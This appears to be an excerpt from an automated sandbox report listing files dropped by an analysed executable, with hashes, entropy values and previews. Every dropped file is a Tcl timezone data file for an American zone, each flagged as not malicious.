                                                                                                                                                                                                                              SHA1:DB2FF76DB3A79BE52E2DFD4C7B8B6592946772F9
                                                                                                                                                                                                                              SHA-256:214F97A3BCB2378CCE23D280EA6A3B691604F82E383628F666BE585BB8494932
                                                                                                                                                                                                                              SHA-512:E5FCD0B54F61910E70B1D0EE9911C5B4AFF850F16B651A01D69A63A97880913B0BAB99B0D864C4E613594734FA72CCA0E9607B1ADB6E75957C790990114FD0A4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Montevideo) {.. {-9223372036854775808 -13491 0 LMT}.. {-1942690509 -13491 0 MMT}.. {-1567455309 -14400 0 -04}.. {-1459627200 -10800 0 -0330}.. {-1443819600 -12600 0 -0330}.. {-1428006600 -10800 1 -0330}.. {-1412283600 -12600 0 -0330}.. {-1396470600 -10800 1 -0330}.. {-1380747600 -12600 0 -0330}.. {-1141590600 -10800 1 -0330}.. {-1128286800 -12600 0 -0330}.. {-1110141000 -10800 1 -0330}.. {-1096837200 -12600 0 -0330}.. {-1078691400 -10800 1 -0330}.. {-1065387600 -12600 0 -0330}.. {-1047241800 -10800 1 -0330}.. {-1033938000 -12600 0 -0330}.. {-1015187400 -10800 1 -0330}.. {-1002488400 -12600 0 -0330}.. {-983737800 -10800 1 -0330}.. {-971038800 -12600 0 -0330}.. {-954707400 -10800 1 -0330}.. {-938984400 -12600 0 -0330}.. {-920838600 -10800 1 -0330}.. {-907534800 -12600 0 -0330}.. {-896819400 -10800 1 -0330}.. {-853621200 -9000 0 -03}.. {-84
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):190
                                                                                                                                                                                                                              Entropy (8bit):4.748877320903638
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEzQ21h4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/290zQgp
                                                                                                                                                                                                                              MD5:9130CD86BD6417DB877BF9D8F3080CE1
                                                                                                                                                                                                                              SHA1:76C37982C37FE54ED539AC14B5A513817E42937C
                                                                                                                                                                                                                              SHA-256:97F48948EF5108FE1F42D548EA47C88D4B51BF1896EE92634C7ED55555B06DBD
                                                                                                                                                                                                                              SHA-512:EE036350AF95414392BD93DFF528F67D9A93EB192A30056ECBC3D2396AB4B2938B3C096C3EC2BC739294D4C4B7261C427B0AAEB9559F5381CB7F375892781820
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Montreal) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):204
                                                                                                                                                                                                                              Entropy (8bit):4.878534808314885
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zQ1HK90ppv:MByMYbpwt290zQ490b
                                                                                                                                                                                                                              MD5:CB5988A2508285B42C2BD487B8F9D6E1
                                                                                                                                                                                                                              SHA1:EAD740A566245B682CE5E284D389DFAE66DF05D9
                                                                                                                                                                                                                              SHA-256:6C3EE46983A3DAA91C9ADF4B18D6B4B80F1505B0057569B66D5B465D4C09B9C1
                                                                                                                                                                                                                              SHA-512:48796213A67F0E3BC56B54CE4D8BE098E74BA5808C9A1082D9381CB729ADFA2ACB9CE9E39A3244B3901405761C97AEE28D44C3BF7239ECC71175C62E152029C4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Montserrat) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):188
                                                                                                                                                                                                                              Entropy (8bit):4.785765433607229
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwEzEeIAcGu:SlSWB9vsM3y7RQtHAIgpRQPN/290xzEf
                                                                                                                                                                                                                              MD5:F7DAD684104D917E0F29F6951EA627AC
                                                                                                                                                                                                                              SHA1:E57B5CA730D90C5865CF32FEC4872F71E033D21C
                                                                                                                                                                                                                              SHA-256:A889810B8BB42CD206D8F8961164AD03CCFBB1924D583075489F78AFA10EAF67
                                                                                                                                                                                                                              SHA-512:8284F2A357A32B2F5A211904F65E3B5C37B77C9BF38C85DFA0A95A73457F3076EC12F09BC767B4D0B8FC86BF69D01A17A7BF685BAB72F3E519A397D050DA0C3B
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nassau) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):11373
                                                                                                                                                                                                                              Entropy (8bit):3.8110553140357086
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:HeohzORhK1a8phYvNoStCt/cL1BRP0HY2iU7KKdFL6Aa2K4gSLf8e:+uORhK1a8phYloSItON0HY2iUmUFLqU
                                                                                                                                                                                                                              MD5:385C3BDD3E41E5E75CEF0658322B5CDE
                                                                                                                                                                                                                              SHA1:0334C21C8316ED2EE16FC98B1E8867D5E0916C00
                                                                                                                                                                                                                              SHA-256:7BA7DA179AA7DF26AC25E7ACCD9BD83784174445285A0D9CCBD7D6A9AA34F4BC
                                                                                                                                                                                                                              SHA-512:764B680FB8414B5AC8FB110247C19B1004A4453DD2BAC94BF3CFD80281FF3679A5B1D212238509165E022269503ED14A54B0EF73AF7014344752E6A627657D1F
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/New_York) {.. {-9223372036854775808 -17762 0 LMT}.. {-2717650800 -18000 0 EST}.. {-1633280400 -14400 1 EDT}.. {-1615140000 -18000 0 EST}.. {-1601830800 -14400 1 EDT}.. {-1583690400 -18000 0 EST}.. {-1577905200 -18000 0 EST}.. {-1570381200 -14400 1 EDT}.. {-1551636000 -18000 0 EST}.. {-1536512400 -14400 1 EDT}.. {-1523210400 -18000 0 EST}.. {-1504458000 -14400 1 EDT}.. {-1491760800 -18000 0 EST}.. {-1473008400 -14400 1 EDT}.. {-1459706400 -18000 0 EST}.. {-1441558800 -14400 1 EDT}.. {-1428256800 -18000 0 EST}.. {-1410109200 -14400 1 EDT}.. {-1396807200 -18000 0 EST}.. {-1378659600 -14400 1 EDT}.. {-1365357600 -18000 0 EST}.. {-1347210000 -14400 1 EDT}.. {-1333908000 -18000 0 EST}.. {-1315155600 -14400 1 EDT}.. {-1301853600 -18000 0 EST}.. {-1283706000 -14400 1 EDT}.. {-1270404000 -18000 0 EST}.. {-1252256400 -14400 1 EDT}.. {-123895440
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):189
                                                                                                                                                                                                                              Entropy (8bit):4.799414617322291
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QFtFb+MuUyqx0qMKLRXnXHAIg20qMKLRE6RL/2IAcGEwMueh4IAcH:SlSWB9vsM3y7RQtHAIgpRQPN/2905u+p
                                                                                                                                                                                                                              MD5:B01CC44E5139066F87ADFF16728B98BF
                                                                                                                                                                                                                              SHA1:4464E187AFF336C9137094308C270BB822974DF1
                                                                                                                                                                                                                              SHA-256:55C37BF1A579A22A790ADE6585CE95BEC02DA356E84D2EF7832C422A4484FF9D
                                                                                                                                                                                                                              SHA-512:A45166FFE444982593CBAC3E683D25D9EDB070DB6CD059A83D1C52099F409FFBFE6EA68D255AD000AF142BF8C8D100271531852263677184597877B7BF318847
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Toronto)]} {.. LoadTimeZoneFile America/Toronto..}..set TZData(:America/Nipigon) $TZData(:America/Toronto)..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8680
                                                                                                                                                                                                                              Entropy (8bit):3.965662913874442
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:OrBvOs5vzC9+j1giaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:OrBvOsM9DiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                              MD5:9A5F536932FED5A93E2C3DEB81960CD1
                                                                                                                                                                                                                              SHA1:8E78396D280DD3A9564CEFC7FB722437F3C4D003
                                                                                                                                                                                                                              SHA-256:8E971C9560CCE548B46626D072E62AB0F4C9682BF6A6ABFB4D0E8D63745402FE
                                                                                                                                                                                                                              SHA-512:60CFDBCE87F9CD7F27E071D66B97E60F62E56F413DC867BC809490B30D00045D0757710D6B5724148E2A28BD1E45FB662391820E6350D998002BF67B16776645
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nome) {.. {-9223372036854775808 46702 0 LMT}.. {-3225223727 -39698 0 LMT}.. {-2188947502 -39600 0 NST}.. {-883573200 -39600 0 NST}.. {-880196400 -36000 1 NWT}.. {-769395600 -36000 1 NPT}.. {-765374400 -39600 0 NST}.. {-757342800 -39600 0 NST}.. {-86878800 -39600 0 BST}.. {-31496400 -39600 0 BST}.. {-21466800 -36000 1 BDT}.. {-5745600 -39600 0 BST}.. {9982800 -36000 1 BDT}.. {25704000 -39600 0 BST}.. {41432400 -36000 1 BDT}.. {57758400 -39600 0 BST}.. {73486800 -36000 1 BDT}.. {89208000 -39600 0 BST}.. {104936400 -36000 1 BDT}.. {120657600 -39600 0 BST}.. {126709200 -36000 1 BDT}.. {152107200 -39600 0 BST}.. {162392400 -36000 1 BDT}.. {183556800 -39600 0 BST}.. {199285200 -36000 1 BDT}.. {215611200 -39600 0 BST}.. {230734800 -36000 1 BDT}.. {247060800 -39600 0 BST}.. {262789200 -36000 1 BDT}.. {278510400 -39600 0 BST}.. {29423880
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1397
                                                                                                                                                                                                                              Entropy (8bit):3.78056049136398
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5TenykFxCFbF3YCFE2FBCFDFr9CFaFPBCFoF2CFTFKCFDuF1CF2F1CFWFhCFGF3a:5quY9EmFYBosNZNW/bWsBzgCccq7JYN9
                                                                                                                                                                                                                              MD5:B4F4530FCE4BF5690042A2DA40413D56
                                                                                                                                                                                                                              SHA1:52D5F2102485F5B326C888A287ED83CA18833BBC
                                                                                                                                                                                                                              SHA-256:9011C76295E6B17CC1973876B497BEE21B9E6562FB25DF66140F811A1FFA9765
                                                                                                                                                                                                                              SHA-512:08CAF75226D190D9FF0AA62AD84B13F1BF9047338A690847DF5B448BDB731A877F3E186298AFD704F4F4E133FF3F3128B098F9D90AE9A8E726AE52F84A7DA2E3
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Noronha) {.. {-9223372036854775808 -7780 0 LMT}.. {-1767217820 -7200 0 -02}.. {-1206961200 -3600 1 -02}.. {-1191366000 -7200 0 -02}.. {-1175378400 -3600 1 -02}.. {-1159830000 -7200 0 -02}.. {-633823200 -3600 1 -02}.. {-622072800 -7200 0 -02}.. {-602287200 -3600 1 -02}.. {-591836400 -7200 0 -02}.. {-570751200 -3600 1 -02}.. {-560214000 -7200 0 -02}.. {-539128800 -3600 1 -02}.. {-531356400 -7200 0 -02}.. {-191368800 -3600 1 -02}.. {-184201200 -7200 0 -02}.. {-155167200 -3600 1 -02}.. {-150073200 -7200 0 -02}.. {-128901600 -3600 1 -02}.. {-121129200 -7200 0 -02}.. {-99957600 -3600 1 -02}.. {-89593200 -7200 0 -02}.. {-68421600 -3600 1 -02}.. {-57970800 -7200 0 -02}.. {499744800 -3600 1 -02}.. {511232400 -7200 0 -02}.. {530589600 -3600 1 -02}.. {540262800 -7200 0 -02}.. {562125600 -3600 1 -02}.. {571194000 -7200 0 -02}.. {592970400 -
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.8810445182855253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:WEktwmGaLV911sF9A604qSScBgN+4ctDzIVQ/c/3hNxTh:WBwDPPA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:10AF9E9461DD03DA4F0AF0595EB36E6C
                                                                                                                                                                                                                              SHA1:57AC9BDE3AC665E49D9D2463A4BFA38C053A4A54
                                                                                                                                                                                                                              SHA-256:D0D8B108453265B60F525A4EC04DE9555087CD6AC5DDBA980B3A96CF0FCD68D1
                                                                                                                                                                                                                              SHA-512:B6DC7D2709A19B911E086C988DB8346F42DBF7601D9E51E3093C6AF897570E43E5F1C101FE88BC5251F3DCC3B532DB22FFE8A12A4D0151BC52AF3E6DDEA7D23A
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Beulah) {.. {-9223372036854775808 -24427 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8557
                                                                                                                                                                                                                              Entropy (8bit):3.867423227197841
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:ZEktwmGaLV9tZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:ZBwD6fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:33C03AD65753D7ADB45FC4899B504D1A
                                                                                                                                                                                                                              SHA1:ED719BB67A64DB49901BA38A945A6BA998646B8D
                                                                                                                                                                                                                              SHA-256:ABC2B6C97D9E9FBA37AC582ADBA2CE996890D090060E083405D75CDAED9EABE0
                                                                                                                                                                                                                              SHA-512:69592E8A370C8A5173827500CDDF8190AB44EA87CD7E0C416055CB7958B13A737801EA6B0FFE6032CB3F14F05001BF9DA83E4AEB20F385019B2985ECE7ACB40E
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/Center) {.. {-9223372036854775808 -24312 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -21600 1
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):8560
                                                                                                                                                                                                                              Entropy (8bit):3.879452555978431
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:GEktwmGaLV9nlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:GBwD2fA604qSBgI7DBch
                                                                                                                                                                                                                              MD5:3D3DC12209293086FD843738A4FE87FB
                                                                                                                                                                                                                              SHA1:8103DFA18B5F3F36AF0B53FA350E0F2D300E6289
                                                                                                                                                                                                                              SHA-256:8803FF7C81C933B57178B9D3C502FB4268D9AA594A3C638A7F17AF60B12D300D
                                                                                                                                                                                                                              SHA-512:39BB939780A71B817F82D2B7F56815D33926D150525161051A9950E5A98BA9184670AFC884A1C69D56EADBD6198E3082975448EFBA5FE8A336DB071E6BAB8EF2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/North_Dakota/New_Salem) {.. {-9223372036854775808 -24339 0 LMT}.. {-2717643600 -25200 0 MST}.. {-1633273200 -21600 1 MDT}.. {-1615132800 -25200 0 MST}.. {-1601823600 -21600 1 MDT}.. {-1583683200 -25200 0 MST}.. {-880210800 -21600 1 MWT}.. {-769395600 -21600 1 MPT}.. {-765388800 -25200 0 MST}.. {-84380400 -21600 1 MDT}.. {-68659200 -25200 0 MST}.. {-52930800 -21600 1 MDT}.. {-37209600 -25200 0 MST}.. {-21481200 -21600 1 MDT}.. {-5760000 -25200 0 MST}.. {9968400 -21600 1 MDT}.. {25689600 -25200 0 MST}.. {41418000 -21600 1 MDT}.. {57744000 -25200 0 MST}.. {73472400 -21600 1 MDT}.. {89193600 -25200 0 MST}.. {104922000 -21600 1 MDT}.. {120643200 -25200 0 MST}.. {126694800 -21600 1 MDT}.. {152092800 -25200 0 MST}.. {162378000 -21600 1 MDT}.. {183542400 -25200 0 MST}.. {199270800 -21600 1 MDT}.. {215596800 -25200 0 MST}.. {230720400 -2160
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7429
                                                                                                                                                                                                                              Entropy (8bit):3.5470060859729253
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:0ixKXpbzvZ+FxAqe12voJ0euJFNgIHc/QEeF5Z1V8tCSfifK3facfzQWWLQelXuC:0LRJq9LstgV
                                                                                                                                                                                                                              MD5:FC9CEA4B9654D0957F55CB0E1B25A3E7
                                                                                                                                                                                                                              SHA1:8BFC3E8CEC34C4087579D3DA727143E3EC045B77
                                                                                                                                                                                                                              SHA-256:12917DAAA60134BFE56E6979BB27B58A3F295C32BAE02B233E849BCED6B8BCA2
                                                                                                                                                                                                                              SHA-512:355628F2EFF86605653A1EE7D976CE8B3229A4169D35576F6007FABAB37DD280D8F296EE88BECE3D84D3A1C476F23275D1D77CAF157E9A98672CBF14801D7292
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Nuuk) {.. {-9223372036854775808 -12416 0 LMT}.. {-1686083584 -10800 0 -03}.. {323845200 -7200 0 -02}.. {338950800 -10800 0 -03}.. {354675600 -7200 1 -02}.. {370400400 -10800 0 -03}.. {386125200 -7200 1 -02}.. {401850000 -10800 0 -03}.. {417574800 -7200 1 -02}.. {433299600 -10800 0 -03}.. {449024400 -7200 1 -02}.. {465354000 -10800 0 -03}.. {481078800 -7200 1 -02}.. {496803600 -10800 0 -03}.. {512528400 -7200 1 -02}.. {528253200 -10800 0 -03}.. {543978000 -7200 1 -02}.. {559702800 -10800 0 -03}.. {575427600 -7200 1 -02}.. {591152400 -10800 0 -03}.. {606877200 -7200 1 -02}.. {622602000 -10800 0 -03}.. {638326800 -7200 1 -02}.. {654656400 -10800 0 -03}.. {670381200 -7200 1 -02}.. {686106000 -10800 0 -03}.. {701830800 -7200 1 -02}.. {717555600 -10800 0 -03}.. {733280400 -7200 1 -02}.. {749005200 -10800 0 -03}.. {764730000 -7200 1 -0
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):2069
                                                                                                                                                                                                                              Entropy (8bit):3.994692300159945
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:5Pe89WU0S+VS+TjV/NF01YluO53ON4Lvf3Pn:5gU033FS1YluOQiLvf3Pn
                                                                                                                                                                                                                              MD5:0CB80C895BB4BFD36043F1CAAFB604B7
                                                                                                                                                                                                                              SHA1:2EC2CA1D31EF1804E4EC26F449CA0D3C4F7AA7A0
                                                                                                                                                                                                                              SHA-256:FC857E4DD0A4AE60A7C56637C752205E20442C7AE62158435BEFCA838174108D
                                                                                                                                                                                                                              SHA-512:4BE44FF49AC588F1B441AB1B2678F5A0F0B60DB5C69F3F45C7447FC5A0175146F9FF83E132A5256CF7E559809EF7394C23DF9156A295D84D3A67EE917E661EED
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Ojinaga) {.. {-9223372036854775808 -25060 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {820476000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {883634400 -21600 0 CST}.. {891766800 -21600 0 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -25200 0 MST}.. {1143968400 -21
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):186
                                                                                                                                                                                                                              Entropy (8bit):4.970379147398626
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:3:SlEVFRKvJT8QF08x/2IAcGEu5YfMXGm2OHGf8xYoHv5BidhZvFsc1HRX1va0v:SlSWB9eg/290ZDm2OHDxYoHv5GhZd93p
                                                                                                                                                                                                                              MD5:AA408A43079EC8933DE271BE3DA2B502
                                                                                                                                                                                                                              SHA1:421A867DB3FD4779C5F759D0B657D8EB5FB2218B
                                                                                                                                                                                                                              SHA-256:990213DDE00ADCEB74C8D1ECAF81B9C77963E4AB1F35767F7349236FC8E917DF
                                                                                                                                                                                                                              SHA-512:1FB740527555A8E128E05709D05720A249BCBA4B6434D00226C07426E6283AA48973F75268F36E6044F0F0650E012781C8E5519B7EA916C625BBF018B29E9961
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Panama) {.. {-9223372036854775808 -19088 0 LMT}.. {-2524502512 -19176 0 CMT}.. {-1946918424 -18000 0 EST}..}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):7736
                                                                                                                                                                                                                              Entropy (8bit):3.8533019559841972
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:tTqPm4bPJWXtRbALtuO/N0HY2iUmUFLqU:Izod
                                                                                                                                                                                                                              MD5:6BA298F9CEB6406802A01C13313F8EF1
                                                                                                                                                                                                                              SHA1:D77C113CFA927EF65461781FD080F590C8CFCBB9
                                                                                                                                                                                                                              SHA-256:1FB962ECC1E5F02E1001C70460FFF720B114554F9AA7956D6DA154DBEA87B4D7
                                                                                                                                                                                                                              SHA-512:C7F4E2DA503A3167098CFAB7AEC8D75A32D6B081E6777DE7BA3D6B4558D0C44D2CD8A0F1626968295031BABFD2CB96B031B4C00A44F2C554B5B217AE67E69EB4
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Reputation:unknown
                                                                                                                                                                                                                              Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Pangnirtung) {.. {-9223372036854775808 0 0 -00}.. {-1546300800 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-147902400 -7200 1 ADDT}.. {-131572800 -14400 0 AST}.. {325663200 -10800 1 ADT}.. {341384400 -14400 0 AST}.. {357112800 -10800 1 ADT}.. {372834000 -14400 0 AST}.. {388562400 -10800 1 ADT}.. {404888400 -14400 0 AST}.. {420012000 -10800 1 ADT}.. {436338000 -14400 0 AST}.. {452066400 -10800 1 ADT}.. {467787600 -14400 0 AST}.. {483516000 -10800 1 ADT}.. {499237200 -14400 0 AST}.. {514965600 -10800 1 ADT}.. {530686800 -14400 0 AST}.. {544600800 -10800 1 ADT}.. {562136400 -14400 0 AST}.. {576050400 -10800 1 ADT}.. {594190800 -14400 0 AST}.. {607500000 -10800 1 ADT}.. {625640400 -14400 0 AST}.. {638949600 -10800 1 ADT}.. {657090000 -14400 0 AST}.. {671004000 -10800 1 ADT}..
                                                                                                                                                                                                                              Process:C:\Users\user\Documents\iofolko5\z2_3yhxvvYYX1CmTdADYCHAQ.exe
                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):253
